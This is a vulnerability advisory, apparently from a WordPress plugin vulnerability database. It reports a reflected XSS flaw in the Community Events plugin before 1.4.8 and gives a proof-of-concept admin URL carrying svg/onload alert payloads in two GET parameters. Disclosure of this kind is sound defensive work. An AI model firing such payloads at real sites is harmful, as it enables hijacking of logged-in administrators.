WordPress Plugin Vulnerabilities
Community Event < 1.4.8 - Reflected Cross-Site Scripting (XSS)
Description
The plugin does not sanitise, validate or escape its importrowscount and successimportcount GET parameters before outputting them back in an admin page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
Proof of Concept
http://wp.lab/wordpress/wp-admin/admin.php?page=community-events-venues&messages=9&importrowscount=%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E&successimportcount=%3Csvg%2Fonload%3Dalert%28%2FXSS2%2F%29%3E
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
iohex
Submitter
iohex
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-02 (about 2 years ago)
Added
2021-07-02 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)